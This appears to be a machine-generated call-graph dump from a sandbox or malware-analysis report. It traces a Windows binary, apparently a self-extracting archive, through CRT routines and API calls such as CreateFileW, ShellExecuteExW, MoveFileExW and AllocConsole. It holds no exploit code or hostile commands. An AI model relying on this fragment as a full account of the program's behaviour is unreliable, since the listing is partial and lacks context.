c8d99a 18304->18305 18306 c8d9ce _abort LeaveCriticalSection 18305->18306 18307 c8d9c1 ___FrameUnwindToState 18306->18307 18307->18301 18308->18281 18309->18285 18311 c8b122 _abort 38 API calls 18310->18311 18312 c8dac3 18311->18312 18312->18291 18314 c8dc8d 18313->18314 18315 c8dc56 18313->18315 18320 c8c58a LeaveCriticalSection 18314->18320 18315->18289 18315->18293 18315->18295 18318 c82495 CatchGuardHandler 5 API calls 18317->18318 18319 c93fd4 18318->18319 18319->18319 18320->18315 18322 c896a6 _abort 18321->18322 18323 c896be 18322->18323 18343 c897f4 GetModuleHandleW 18322->18343 18353 c8c542 EnterCriticalSection 18323->18353 18327 c89764 18361 c897a4 18327->18361 18331 c8973b 18332 c89753 18331->18332 18357 c8a4d0 18331->18357 18338 c8a4d0 _abort 5 API calls 18332->18338 18333 c896c6 18333->18327 18333->18331 18354 c8a1a0 18333->18354 18334 c897ad 18336 c93fc9 _abort 5 API calls 18334->18336 18335 c89781 18364 c897b3 18335->18364 18341 c897b2 18336->18341 18338->18327 18344 c896b2 18343->18344 18344->18323 18345 c89838 GetModuleHandleExW 18344->18345 18346 c89862 GetProcAddress 18345->18346 18347 c89885 18345->18347 18350 c89877 18346->18350 18348 c8988b FreeLibrary 18347->18348 18349 c89894 18347->18349 18348->18349 18351 c82495 CatchGuardHandler 5 API calls 18349->18351 18350->18347 18352 c8989e 18351->18352 18352->18323 18353->18333 18355 c89ed9 _abort 20 API calls 18354->18355 18356 c8a1b7 18355->18356 18356->18331 18358 c8a4ff 18357->18358 18359 c82495 CatchGuardHandler 5 API calls 18358->18359 18360 c8a528 18359->18360 18360->18332 18362 c8c58a _abort LeaveCriticalSection 18361->18362 18363 c8977d 18362->18363 18363->18334 18363->18335 18365 c8c97f _abort 10 API calls 18364->18365 18366 c897bd 18365->18366 18367 c897e1 18366->18367 18368 c897c1 GetPEB 18366->18368 18370 c89838 _abort 8 API calls 18367->18370 18368->18367 18369 c897d1 GetCurrentProcess TerminateProcess 18368->18369 18369->18367 18371 c897e9 ExitProcess 18370->18371 18373 c8e5d4 ___FrameUnwindToState 18372->18373 18374 c8b122 _abort 38 API calls 18373->18374 18375 c8e5dd 18374->18375 18376 c8e62b ___FrameUnwindToState 18375->18376 18384 c8c542 EnterCriticalSection 18375->18384 18376->18248 18378 c8e5fb 18385 c8e63f 18378->18385 18383 c8a886 _abort 38 API calls 18383->18376 18384->18378 18386 c8e64d __fassign 18385->18386 18388 c8e60f 18385->18388 18387 c8e37b __fassign 20 API calls 18386->18387 18386->18388 18387->18388 18389 c8e62e 18388->18389 18392 c8c58a LeaveCriticalSection 18389->18392 18391 c8e622 18391->18376 18391->18383 18392->18391 18394 c8d3ee ___FrameUnwindToState 18393->18394 18395 c8b122 _abort 38 API calls 18394->18395 18397 c8d3f8 18395->18397 18398 c8d47c ___FrameUnwindToState 18397->18398 18400 c8a886 _abort 38 API calls 18397->18400 18401 c8a7fe _free 20 API calls 18397->18401 18402 c8c542 EnterCriticalSection 18397->18402 18403 c8d473 18397->18403 18398->18254 18400->18397 18401->18397 18402->18397 18406 c8c58a LeaveCriticalSection 18403->18406 18405 c8d47a 18405->18397 18406->18405 18408 c892f1 18407->18408 18409 c89304 18407->18409 18410 c8ac42 _free 20 API calls 18408->18410 18409->18196 18411 c892f6 18410->18411 18412 c8ab21 pre_c_initialization 26 API calls 18411->18412 18413 c89301 18412->18413 18413->18196 18415 c87606 __vswprintf_c_l 18414->18415 18416 c8761d 18415->18416 18417 c8ac42 _free 20 API calls 18415->18417 18416->18196 18418 c8760f 18417->18418 18419 c8ab21 pre_c_initialization 26 API calls 18418->18419 18420 c8761a 18419->18420 18420->18196 18422 c87a4e 18421->18422 18423 c87a44 18421->18423 18422->18196 18486 c87446 18423->18486 18427 c87642 18426->18427 18429 c8764c 18426->18429 18428 c87446 __vswprintf_c_l 39 API calls 18427->18428 18430 c8764b 18428->18430 18429->18196 18430->18196 18432 c8766d 18431->18432 18433 c87687 18431->18433 18434 c876b8 18432->18434 18436 c87872 18432->18436 18437 c87807 18432->18437 18433->18434 18435 c8ac42 _free 20 API calls 18433->18435 18434->18196 18438 c876a4 18435->18438 18439 c878b8 18436->18439 18440 c87879 18436->18440 18450 c87849 18436->18450 18446 c87813 18437->18446 18437->18450 18441 c8ab21 pre_c_initialization 26 API calls 18438->18441 18549 c87f0f 18439->18549 18444 c8787e 18440->18444 18445 c87820 18440->18445 18442 c876af 18441->18442 18442->18196 18444->18450 18451 c87883 18444->18451 18459 c8782e __vswprintf_c_l 18445->18459 18461 c87842 __vswprintf_c_l 18445->18461 18541 c87b28 18445->18541 18446->18445 18449 c87859 18446->18449 18446->18459 18449->18461 18521 c87c9a 18449->18521 18450->18459 18450->18461 18535 c87d32 18450->18535 18452 c87888 18451->18452 18453 c87896 18451->18453 18452->18461 18525 c87ef0 18452->18525 18529 c87e7c 18453->18529 18454 c82495 CatchGuardHandler 5 API calls 18457 c87a39 18454->18457 18457->18196 18459->18461 18552 c88020 18459->18552 18461->18454 18463 c87872 18462->18463 18464 c87807 18462->18464 18465 c878b8 18463->18465 18466 c87879 18463->18466 18470 c87849 18463->18470 18464->18470 18472 c87813 18464->18472 18469 c87f0f __vswprintf_c_l 26 API calls 18465->18469 18467 c8787e 18466->18467 18468 c87820 18466->18468 18467->18470 18475 c87883 18467->18475 18471 c87842 __vswprintf_c_l 18468->18471 18474 c87b28 __vswprintf_c_l 48 API calls 18468->18474 18484 c8782e __vswprintf_c_l 18468->18484 18469->18484 18470->18471 18473 c87d32 __vswprintf_c_l 26 API calls 18470->18473 18470->18484 18479 c82495 CatchGuardHandler 5 API calls 18471->18479 18472->18468 18476 c87859 18472->18476 18472->18484 18473->18484 18474->18484 18477 c87888 18475->18477 18478 c87896 18475->18478 18476->18471 18481 c87c9a __vswprintf_c_l 40 API calls 18476->18481 18477->18471 18483 c87ef0 __vswprintf_c_l 26 API calls 18477->18483 18480 c87e7c __vswprintf_c_l 26 API calls 18478->18480 18482 c87a39 18479->18482 18480->18484 18481->18484 18482->18196 18483->18484 18484->18471 18485 c88020 __vswprintf_c_l 40 API calls 18484->18485 18485->18471 18489 c8ac70 18486->18489 18490 c8ac8b __vswprintf_c_l 18489->18490 18493 c88bb3 18490->18493 18494 c892ec __vswprintf_c_l 26 API calls 18493->18494 18498 c88bc5 18494->18498 18495 c88c02 18496 c8729e __fassign 38 API calls 18495->18496 18503 c88c0e 18496->18503 18497 c88bdc 18499 c8ac42 _free 20 API calls 18497->18499 18498->18495 18498->18497 18510 c8746f 18498->18510 18500 c88be1 18499->18500 18501 c8ab21 pre_c_initialization 26 API calls 18500->18501 18501->18510 18505 c88c34 18503->18505 18511 c8c4a2 18503->18511 18504 c88f0b 18506 c892c0 __vswprintf_c_l 26 API calls 18504->18506 18505->18504 18515 c892c0 18505->18515 18508 c8922e __vswprintf_c_l 18506->18508 18509 c8ac42 _free 20 API calls 18508->18509 18508->18510 18509->18510 18510->18196 18512 c8c4bb 18511->18512 18514 c8c4b7 18511->18514 18513 c8c4d3 GetStringTypeW 18512->18513 18512->18514 18513->18514 18514->18503 18516 c892e8 18515->18516 18517 c892d3 18515->18517 18516->18504 18517->18516 18518 c8ac42 _free 20 API calls 18517->18518 18519 c892dd 18518->18519 18520 c8ab21 pre_c_initialization 26 API calls 18519->18520 18520->18516 18523 c87cc6 __vswprintf_c_l 18521->18523 18522 c87cf5 18522->18459 18523->18522 18556 c8ac9c 18523->18556 18526 c87efc 18525->18526 18527 c87d32 __vswprintf_c_l 26 API calls 18526->18527 18528 c87f0e 18527->18528 18528->18459 18534 c87e91 __vswprintf_c_l 18529->18534 18530 c8ac42 _free 20 API calls 18531 c87e9a 18530->18531 18532 c8ab21 pre_c_initialization 26 API calls 18531->18532 18533 c87ea5 18532->18533 18533->18459 18534->18530 18534->18533 18536 c87d43 __vswprintf_c_l 18535->18536 18537 c8ac42 _free 20 API calls 18536->18537 18540 c87d6d __vswprintf_c_l 18536->18540 18538 c87d62 18537->18538 18539 c8ab21 pre_c_initialization 26 API calls 18538->18539 18539->18540 18540->18459 18542 c87b44 18541->18542 18571 c86fc0 18542->18571 18544 c87b91 __vswprintf_c_l 18581 c8bb96 18544->18581 18548 c87c2a __vswprintf_c_l 18548->18459 18550 c87d32 __vswprintf_c_l 26 API calls 18549->18550 18551 c87f26 18550->18551 18551->18459 18554 c88080 __vswprintf_c_l 18552->18554 18555 c88032 __vswprintf_c_l 18552->18555 18553 c8ac9c __fassign 40 API calls 18553->18555 18554->18461 18555->18553 18555->18554 18557 c8acad 18556->18557 18560 c8acb9 18556->18560 18558 c8729e __fassign 38 API calls 18557->18558 18557->18560 18559 c8acd9 18558->18559 18559->18560 18568 c8c10f 18559->18568 18560->18522 18563 c8ad4d MultiByteToWideChar 18563->18560 18567 c8ad3d 18563->18567 18564 c8ad0d 18566 c8ad1b MultiByteToWideChar 18564->18566 18564->18567 18565 c8ac42 _free 20 API calls 18565->18560 18566->18560 18566->18567 18567->18560 18567->18565 18569 c8729e __fassign 38 API calls 18568->18569 18570 c8ad07 18569->18570 18570->18563 18570->18564 18572 c86fdc 18571->18572 18575 c86feb 18571->18575 18573 c8ac42 _free 20 API calls 18572->18573 18574 c86fe1 18573->18574 18574->18544 18575->18574 18613 c8a838 18575->18613 18578 c87029 18580 c8a7fe _free 20 API calls 18578->18580 18580->18574 18582 c8bbbc 18581->18582 18583 c8bba6 18581->18583 18585 c8bbd0 18582->18585 18591 c8bbe6 __vswprintf_c_l 18582->18591 18584 c8ac42 _free 20 API calls 18583->18584 18586 c8bbab 18584->18586 18587 c8ac42 _free 20 API calls 18585->18587 18588 c8ab21 pre_c_initialization 26 API calls 18586->18588 18589 c8bbd5 18587->18589 18600 c87c0b 18588->18600 18590 c8ab21 pre_c_initialization 26 API calls 18589->18590 18590->18600 18592 c8bc42 18591->18592 18594 c8bc20 __vswprintf_c_l 18591->18594 18593 c8bc60 18592->18593 18595 c8bc65 18592->18595 18597 c8bc89 18593->18597 18598 c8bcbf 18593->18598 18623 c8ba6a 18594->18623 18633 c8b355 18595->18633 18601 c8bc8e 18597->18601 18602 c8bca7 18597->18602 18661 c8b658 18598->18661 18600->18548 18606 c873ea 18600->18606 18644 c8b9a2 18601->18644 18654 c8b83e 18602->18654 18745 c8871f 18606->18745 18608 c87410 18609 c8871f __vswprintf_c_l 46 API calls 18608->18609 18612 c87419 18609->18612 18611 c873fc 18611->18608 18749 c8ab9c 18611->18749 18612->18548 18614 c8a876 18613->18614 18618 c8a846 _CallSETranslator 18613->18618 18615 c8ac42 _free 20 API calls 18614->18615 18617 c87012 18615->18617 18616 c8a861 RtlAllocateHeap 18616->18617 18616->18618 18617->18578 18620 c8733b 18617->18620 18618->18614 18618->18616 18619 c8a347 new 7 API calls 18618->18619 18619->18618 18621 c8a7fe _free 20 API calls 18620->18621 18622 c8734a 18621->18622 18622->18578 18624 c8ba90 18623->18624 18627 c8baa5 18623->18627 18625 c82495 CatchGuardHandler 5 API calls 18624->18625 18626 c8baa1 18625->18626 18626->18600 18668 c8a7a4 18627->18668 18630 c8bb55 18631 c8ab31 pre_c_initialization 11 API calls 18630->18631 18632 c8bb61 18631->18632 18634 c8b369 18633->18634 18635 c8729e __fassign 38 API calls 18634->18635 18636 c8b37b 18635->18636 18637 c8b383 18636->18637 18638 c8b397 18636->18638 18639 c8ac42 _free 20 API calls 18637->18639 18641 c8b658 __vswprintf_c_l 40 API calls 18638->18641 18643 c8b392 __alldvrm __vswprintf_c_l ___scrt_fastfail _strrchr 18638->18643 18640 c8b388 18639->18640 18642 c8ab21 pre_c_initialization 26 API calls 18640->18642 18641->18643 18642->18643 18643->18600 18677 c8f14e 18644->18677 18655 c8f14e __vswprintf_c_l 28 API calls 18654->18655 18656 c8b86b 18655->18656 18657 c8ebb3 __vswprintf_c_l 26 API calls 18656->18657 18658 c8b8a3 18657->18658 18659 c8b8aa 18658->18659 18660 c8b8cb __vswprintf_c_l 38 API calls 18658->18660 18659->18600 18660->18659 18662 c8f14e __vswprintf_c_l 28 API calls 18661->18662 18663 c8b680 18662->18663 18664 c8ebb3 __vswprintf_c_l 26 API calls 18663->18664 18665 c8b6c5 18664->18665 18666 c8b6cc 18665->18666 18667 c8b6f3 __vswprintf_c_l 38 API calls 18665->18667 18666->18600 18667->18666 18669 c8a7b1 18668->18669 18670 c8a7bf 18668->18670 18669->18670 18672 c8a7d6 18669->18672 18671 c8ac42 _free 20 API calls 18670->18671 18676 c8a7c7 18671->18676 18674 c8a7d1 18672->18674 18675 c8ac42 _free 20 API calls 18672->18675 18673 c8ab21 pre_c_initialization 26 API calls 18673->18674 18674->18624 18674->18630 18675->18676 18676->18673 18683 c8f183 __vswprintf_c_l 18677->18683 18678 c8f1bf 18679 c8a7a4 ___std_exception_copy 26 API calls 18678->18679 18680 c904af 18679->18680 18681 c904dd 18680->18681 18682 c90487 __vswprintf_c_l 18680->18682 18684 c8ab31 pre_c_initialization 11 API calls 18681->18684 18685 c82495 CatchGuardHandler 5 API calls 18682->18685 18683->18678 18687 c8f212 18683->18687 18686 c904e9 18684->18686 18688 c8b9d0 18685->18688 18689 c911c0 __vswprintf_c_l 22 API calls 18687->18689 18719 c8ebb3 18688->18719 18690 c8f28f 18689->18690 18691 c912d0 __floor_pentium4 22 API calls 18690->18691 18692 c8f299 __vswprintf_c_l 18691->18692 18694 c8f500 __vswprintf_c_l 18692->18694 18696 c8f31e __vswprintf_c_l 18692->18696 18700 c8f599 18692->18700 18693 c904ea __vswprintf_c_l 26 API calls 18701 c8f717 ___scrt_fastfail 18693->18701 18695 c904ea __vswprintf_c_l 26 API calls 18694->18695 18694->18700 18695->18700 18697 c904ea __vswprintf_c_l 26 API calls 18696->18697 18703 c8f3b2 18696->18703 18697->18703 18698 c904ea __vswprintf_c_l 26 API calls 18700->18693 18700->18701 18701->18698 18702 c904ea __vswprintf_c_l 26 API calls 18703->18702 18720 c8ebc0 18719->18720 18721 c8ebd6 18719->18721 18721->18720 18746 c8872d 18745->18746 18747 c88737 18745->18747 18754 c886eb 18746->18754 18747->18611 18750 c8abb8 18749->18750 18751 c8abaa 18749->18751 18750->18611 18757 c8ab64 18751->18757 18755 c8850a __vswprintf_c_l 46 API calls 18754->18755 18756 c88700 18755->18756 18756->18747 18758 c8729e __fassign 38 API calls 18757->18758 18759 c8ab77 18758->18759 18760 c886b8 __vswprintf_c_l 42 API calls 18759->18760 18761 c8ab85 18760->18761 18761->18611 18779 c82323 18780 c8232f ___FrameUnwindToState 18779->18780 18805 c81cb4 18780->18805 18782 c82336 18784 c8235f 18782->18784 18872 c82655 IsProcessorFeaturePresent 18782->18872 18788 c8239e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 18784->18788 18876 c8a52c 18784->18876 18787 c8a4d0 _abort 5 API calls 18787->18788 18795 c823fe 18788->18795 18880 c898e5 18788->18880 18789 c8237e ___FrameUnwindToState 18816 c82770 18795->18816 18806 c81cbd 18805->18806 18900 c824ab IsProcessorFeaturePresent 18806->18900 18810 c81cce 18811 c81cd2 18810->18811 18911 c8a30f 18810->18911 18811->18782 18814 c81ce9 18814->18782 18986 c82bf0 18816->18986 18818 c82783 GetStartupInfoW 18819 c82404 18818->18819 18820 c8a47d 18819->18820 18988 c8d3c4 18820->18988 18822 c8a486 18823 c8240d 18822->18823 18992 c8d6ce 18822->18992 18825 c80f8f 18823->18825 19147 c75edc 18825->19147 18829 c80fae 19196 c7df6c 18829->19196 18831 c80fb7 19200 c76bc0 GetCPInfo 18831->19200 18833 c80fc1 ___scrt_fastfail 18834 c80fd4 GetCommandLineW 18833->18834 18835 c81061 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 18834->18835 18836 c80fe3 18834->18836 18837 c736d0 _swprintf 51 API calls 18835->18837 19203 c7f798 18836->19203 18839 c810ca SetEnvironmentVariableW GetModuleHandleW LoadIconW 18837->18839 19216 c7e93a LoadBitmapW 18839->19216 18842 c8105b 19210 c80ca3 18842->19210 18843 c80ff1 OpenFileMappingW 18846 c8100a MapViewOfFile 18843->18846 18847 c81051 CloseHandle 18843->18847 18847->18835 18873 c8266b ___scrt_fastfail 18872->18873 18874 c82713 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18873->18874 18875 c8275d 18874->18875 18875->18782 18879 c8a543 18876->18879 18877 c82495 CatchGuardHandler 5 API calls 18878 c82378 18877->18878 18878->18787 18878->18789 18879->18877 18881 c8a6a8 _abort 18880->18881 18882 c8990d pre_c_initialization 18880->18882 18883 c8b122 _abort 38 API calls 18881->18883 18882->18795 18885 c8a6b9 18883->18885 18884 c8a886 _abort 38 API calls 18886 c8a6e3 pre_c_initialization 18884->18886 18885->18884 18887 c8ac42 _free 20 API calls 18886->18887 18890 c8a722 pre_c_initialization 18886->18890 18888 c8a718 18887->18888 18889 c8ab21 pre_c_initialization 26 API calls 18888->18889 18889->18890 18890->18795 18901 c81cc9 18900->18901 18902 c85684 18901->18902 18903 c85689 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 18902->18903 18922 c867fe 18903->18922 18907 c856aa 18907->18810 18908 c8569f 18908->18907 18936 c8683a 18908->18936 18910 c85697 18910->18810 18978 c8d8b0 18911->18978 18914 c856ad 18915 c856c7 18914->18915 18916 c856b6 18914->18916 18915->18811 18917 c85a23 ___vcrt_uninitialize_ptd 6 API calls 18916->18917 18918 c856bb 18917->18918 18919 c8683a ___vcrt_uninitialize_locks DeleteCriticalSection 18918->18919 18920 c856c0 18919->18920 18982 c86af5 18920->18982 18924 c86807 18922->18924 18925 c86830 18924->18925 18926 c85693 18924->18926 18940 c86a75 18924->18940 18927 c8683a ___vcrt_uninitialize_locks DeleteCriticalSection 18925->18927 18926->18910 18928 c859f0 18926->18928 18927->18926 18959 c8698a 18928->18959 18930 c859fa 18931 c85a05 18930->18931 18964 c86a38 18930->18964 18931->18908 18933 c85a13 18934 c85a20 18933->18934 18969 c85a23 18933->18969 18934->18908 18937 c86864 18936->18937 18938 c86845 18936->18938 18937->18910 18939 c8684f DeleteCriticalSection 18938->18939 18939->18937 18939->18939 18945 c86869 18940->18945 18943 c86aac InitializeCriticalSectionAndSpinCount 18944 c86a98 18943->18944 18944->18924 18946 c8689d 18945->18946 18949 c86899 18945->18949 18946->18943 18946->18944 18947 c868bd 18947->18946 18950 c868c9 GetProcAddress 18947->18950 18949->18946 18949->18947 18952 c86909 18949->18952 18951 c868d9 __crt_fast_encode_pointer 18950->18951 18951->18946 18953 c86931 LoadLibraryExW 18952->18953 18957 c86926 18952->18957 18954 c8694d GetLastError 18953->18954 18955 c86965 18953->18955 18954->18955 18958 c86958 LoadLibraryExW 18954->18958 18956 c8697c FreeLibrary 18955->18956 18955->18957 18956->18957 18957->18949 18958->18955 18960 c86869 try_get_function 5 API calls 18959->18960 18961 c869a4 18960->18961 18962 c869bc TlsAlloc 18961->18962 18963 c869ad 18961->18963 18963->18930 18965 c86869 try_get_function 5 API calls 18964->18965 18966 c86a52 18965->18966 18967 c86a6c TlsSetValue 18966->18967 18968 c86a61 18966->18968 18967->18968 18968->18933 18970 c85a33 18969->18970 18971 c85a2d 18969->18971 18970->18931 18973 c869c4 18971->18973 18974 c86869 try_get_function 5 API calls 18973->18974 18975 c869de 18974->18975 18976 c869f5 TlsFree 18975->18976 18977 c869ea 18975->18977 18976->18977 18977->18970 18981 c8d8c9 18978->18981 18979 c82495 CatchGuardHandler 5 API calls 18980 c81cdb 18979->18980 18980->18814 18980->18914 18981->18979 18983 c86afe 18982->18983 18985 c86b24 18982->18985 18984 c86b0e FreeLibrary 18983->18984 18983->18985 18984->18983 18985->18915 18987 c82c07 18986->18987 18987->18818 18987->18987 18989 c8d3cd 18988->18989 18990 c8d3d6 18988->18990 18995 c8d2c3 18989->18995 18990->18822 19144 c8d675 18992->19144 18996 c8b122 _abort 38 API calls 18995->18996 18997 c8d2d0 18996->18997 18998 c8d3e2 __fassign 38 API calls 18997->18998 18999 c8d2d8 18998->18999 19015 c8d057 18999->19015 19002 c8d2ef 19002->18990 19003 c8a838 __onexit 21 API calls 19004 c8d300 19003->19004 19005 c8d332 19004->19005 19022 c8d484 19004->19022 19008 c8a7fe _free 20 API calls 19005->19008 19008->19002 19009 c8d32d 19010 c8ac42 _free 20 API calls 19009->19010 19010->19005 19011 c8d376 19011->19005 19032 c8cf2d 19011->19032 19012 c8d34a 19012->19011 19013 c8a7fe _free 20 API calls 19012->19013 19013->19011 19016 c8729e __fassign 38 API calls 19015->19016 19017 c8d069 19016->19017 19018 c8d078 GetOEMCP 19017->19018 19019 c8d08a 19017->19019 19020 c8d0a1 19018->19020 19019->19020 19021 c8d08f GetACP 19019->19021 19020->19002 19020->19003 19021->19020 19023 c8d057 40 API calls 19022->19023 19024 c8d4a3 19023->19024 19027 c8d4f4 IsValidCodePage 19024->19027 19029 c8d4aa 19024->19029 19031 c8d519 ___scrt_fastfail 19024->19031 19025 c82495 CatchGuardHandler 5 API calls 19026 c8d325 19025->19026 19026->19009 19026->19012 19028 c8d506 GetCPInfo 19027->19028 19027->19029 19028->19029 19028->19031 19029->19025 19035 c8d12f GetCPInfo 19031->19035 19108 c8ceea 19032->19108 19036 c8d213 19035->19036 19041 c8d169 19035->19041 19038 c82495 CatchGuardHandler 5 API calls 19036->19038 19040 c8d2bf 19038->19040 19040->19029 19045 c8e1e1 19041->19045 19046 c8729e __fassign 38 API calls 19045->19046 19047 c8e201 MultiByteToWideChar 19046->19047 19049 c8e23f 19047->19049 19056 c8e2d7 19047->19056 19051 c8e260 __vswprintf_c_l ___scrt_fastfail 19049->19051 19052 c8a838 __onexit 21 API calls 19049->19052 19050 c82495 CatchGuardHandler 5 API calls 19053 c8d1ca 19050->19053 19054 c8e2d1 19051->19054 19057 c8e2a5 MultiByteToWideChar 19051->19057 19052->19051 19059 c8c437 19053->19059 19064 c8c482 19054->19064 19056->19050 19057->19054 19058 c8e2c1 GetStringTypeW 19057->19058 19058->19054 19060 c8729e __fassign 38 API calls 19059->19060 19061 c8c44a 19060->19061 19068 c8c21a 19061->19068 19065 c8c48e 19064->19065 19067 c8c49f 19064->19067 19066 c8a7fe _free 20 API calls 19065->19066 19065->19067 19066->19067 19067->19056 19069 c8c235 __vswprintf_c_l 19068->19069 19070 c8c25b MultiByteToWideChar 19069->19070 19109 c8cef6 ___FrameUnwindToState 19108->19109 19116 c8c542 EnterCriticalSection 19109->19116 19111 c8cf00 19117 c8cf55 19111->19117 19116->19111 19129 c904ea 19117->19129 19119 c8cfa3 19120 c904ea __vswprintf_c_l 26 API calls 19119->19120 19130 c904fb 19129->19130 19138 c904f7 __vswprintf_c_l 19129->19138 19131 c90502 19130->19131 19134 c90515 ___scrt_fastfail 19130->19134 19132 c8ac42 _free 20 API calls 19131->19132 19136 c9054c 19134->19136 19137 c90543 19134->19137 19134->19138 19136->19138 19138->19119 19145 c8729e __fassign 38 API calls 19144->19145 19146 c8d689 19145->19146 19146->18822 19253 c81bc0 19147->19253 19150 c75f51 19154 c76286 GetModuleFileNameW 19150->19154 19264 c89307 19150->19264 19151 c75f00 GetProcAddress 19152 c75f29 GetProcAddress 19151->19152 19153 c75f19 19151->19153 19152->19150 19155 c75f35 19152->19155 19153->19152 19164 c762a1 19154->19164 19155->19150 19158 c761cf GetModuleFileNameW CreateFileW 19159 c761fe SetFilePointer 19158->19159 19160 c7627a CloseHandle 19158->19160 19159->19160 19161 c7620e ReadFile 19159->19161 19160->19154 19161->19160 19162 c7622d 19161->19162 19162->19160 19167 c75e92 2 API calls 19162->19167 19166 c762d6 CompareStringW 19164->19166 19168 c7630c GetFileAttributesW 19164->19168 19169 c76320 19164->19169 19255 c729f2 19164->19255 19258 c75e92 19164->19258 19166->19164 19167->19162 19168->19164 19168->19169 19170 c7632d 19169->19170 19173 c7635f 19169->19173 19172 c76345 GetFileAttributesW 19170->19172 19174 c76359 19170->19174 19171 c7646e 19195 c7dac4 GetCurrentDirectoryW 19171->19195 19172->19170 19172->19174 19173->19171 19175 c729f2 GetVersionExW 19173->19175 19174->19173 19176 c76379 19175->19176 19177 c763e6 19176->19177 19178 c76380 19176->19178 19179 c736d0 _swprintf 51 API calls 19177->19179 19180 c75e92 2 API calls 19178->19180 19181 c7640e AllocConsole 19179->19181 19182 c7638a 19180->19182 19183 c76466 ExitProcess 19181->19183 19184 c7641b GetCurrentProcessId AttachConsole 19181->19184 19185 c75e92 2 API calls 19182->19185 19268 c86e03 19184->19268 19187 c76394 19185->19187 19189 c73fb9 54 API calls 19187->19189 19188 c7643c GetStdHandle WriteConsoleW Sleep FreeConsole 19188->19183 19190 c763af 19189->19190 19191 c736d0 _swprintf 51 API calls 19190->19191 19192 c763c2 19191->19192 19193 c73fb9 54 API calls 19192->19193 19194 c763d1 19193->19194 19194->19183 19195->18829 19197 c75e92 2 API calls 19196->19197 19198 c7df80 OleInitialize 19197->19198 19199 c7dfa3 GdiplusStartup SHGetMalloc 19198->19199 19199->18831 19201 c76be4 IsDBCSLeadByte 19200->19201 19201->19201 19202 c76bfc 19201->19202 19202->18833 19209 c7f7a2 19203->19209 19204 c7f7ea CharUpperW 19204->19209 19205 c7f8b8 19205->18842 19205->18843 19206 c7f86d CharUpperW 19206->19209 19208 c7f811 CharUpperW 19208->19209 19209->19204 19209->19205 19209->19206 19209->19208 19319 c74d6a 19209->19319 19217 c7e964 GetObjectW 19216->19217 19218 c7e95b 19216->19218 19405 c7d9f6 19217->19405 19410 c7db06 FindResourceW 19218->19410 19254 c75ee6 GetModuleHandleW 19253->19254 19254->19150 19254->19151 19256 c72a06 GetVersionExW 19255->19256 19257 c72a42 19255->19257 19256->19257 19257->19164 19259 c81bc0 19258->19259 19260 c75e9f GetSystemDirectoryW 19259->19260 19261 c75eb7 19260->19261 19262 c75ed5 19260->19262 19263 c75ec8 LoadLibraryW 19261->19263 19262->19164 19263->19262 19265 c89320 __vswprintf_c_l 19264->19265 19270 c8898b 19265->19270 19269 c86e0b 19268->19269 19269->19188 19269->19269 19271 c892ec __vswprintf_c_l 26 API calls 19270->19271 19274 c8899d 19271->19274 19272 c889d8 19273 c8729e __fassign 38 API calls 19272->19273 19280 c889e4 19273->19280 19274->19272 19275 c889b2 19274->19275 19287 c761c4 19274->19287 19276 c8ac42 _free 20 API calls 19275->19276 19277 c889b7 19276->19277 19278 c8ab21 pre_c_initialization 26 API calls 19277->19278 19278->19287 19282 c88a13 19280->19282 19288 c886b8 19280->19288 19281 c88a7f 19283 c89298 26 API calls 19281->19283 19282->19281 19295 c89298 19282->19295 19285 c88b46 __vswprintf_c_l 19283->19285 19286 c8ac42 _free 20 API calls 19285->19286 19285->19287 19286->19287 19287->19154 19287->19158 19289 c886da 19288->19289 19290 c886c4 19288->19290 19310 c8868e 19289->19310 19290->19289 19291 c886cc 19290->19291 19301 c8c148 19291->19301 19294 c886d8 19294->19280 19296 c892bc 19295->19296 19297 c892a8 19295->19297 19296->19281 19297->19296 19298 c8ac42 _free 20 API calls 19297->19298 19299 c892b1 19298->19299 19300 c8ab21 pre_c_initialization 26 API calls 19299->19300 19300->19296 19302 c8729e __fassign 38 API calls 19301->19302 19303 c8c169 19302->19303 19304 c8c173 19303->19304 19305 c8c10f __fassign 38 API calls 19303->19305 19307 c82495 CatchGuardHandler 5 API calls 19304->19307 19306 c8c193 19305->19306 19309 c8e1e1 __vswprintf_c_l 42 API calls 19306->19309 19308 c8c216 19307->19308 19308->19294 19309->19304 19311 c8869a 19310->19311 19312 c886a7 19310->19312 19311->19294 19314 c8c0e9 19312->19314 19315 c8b122 _abort 38 API calls 19314->19315 19316 c8c0f4 19315->19316 19317 c8b271 __fassign 38 API calls 19316->19317 19318 c8c104 19317->19318 19318->19311 19320 c74d90 19319->19320 19321 c74d79 ___scrt_fastfail 19319->19321 19323 c74c7f 19320->19323 19321->19209 20664 c7ff3d 20666 c7ff42 20664->20666 20669 c7f95f _wcsrchr 20664->20669 20665 c7e5b0 ExpandEnvironmentStringsW 20665->20669 20666->20669 20689 c80870 20666->20689 20667 c80508 20669->20665 20669->20667 20671 c7fc4c SetWindowTextW 20669->20671 20673 c7e708 69 API calls 20669->20673 20674 c727a3 7 API calls 20669->20674 20676 c7272c FindClose 20669->20676 20687 c7fa30 ___scrt_fastfail 20669->20687 20713 c76fa3 CompareStringW 20669->20713 20714 c7dac4 GetCurrentDirectoryW 20669->20714 20671->20669 20673->20669 20674->20669 20675 c7fa3d SetFileAttributesW 20677 c7faf8 GetFileAttributesW 20675->20677 20675->20687 20676->20669 20679 c7fb06 DeleteFileW 20677->20679 20677->20687 20678 c731a0 52 API calls 20678->20687 20679->20687 20680 c7fe16 GetDlgItem SetWindowTextW SendMessageW 20680->20687 20681 c727a3 7 API calls 20681->20687 20682 c736d0 _swprintf 51 API calls 20684 c7fb3b GetFileAttributesW 20682->20684 20683 c7fe58 SendMessageW 20683->20669 20685 c7fb4c MoveFileW 20684->20685 20684->20687 20686 c7fb64 MoveFileExW 20685->20686 20685->20687 20686->20687 20687->20669 20687->20675 20687->20678 20687->20680 20687->20681 20687->20682 20687->20683 20688 c7fad4 SHFileOperationW 20687->20688 20688->20677 20690 c8087a ___scrt_fastfail 20689->20690 20691 c80965 20690->20691 20697 c80ad2 20690->20697 20715 c76fa3 CompareStringW 20690->20715 20693 c723ea 4 API calls 20691->20693 20694 c8097a 20693->20694 20695 c80999 ShellExecuteExW 20694->20695 20716 c72ec0 20694->20716 20696 c809ac 20695->20696 20695->20697 20700 c809d6 IsWindowVisible 20696->20700 20701 c809e7 WaitForInputIdle 20696->20701 20702 c80a3d CloseHandle 20696->20702 20697->20669 20699 c80991 20699->20695 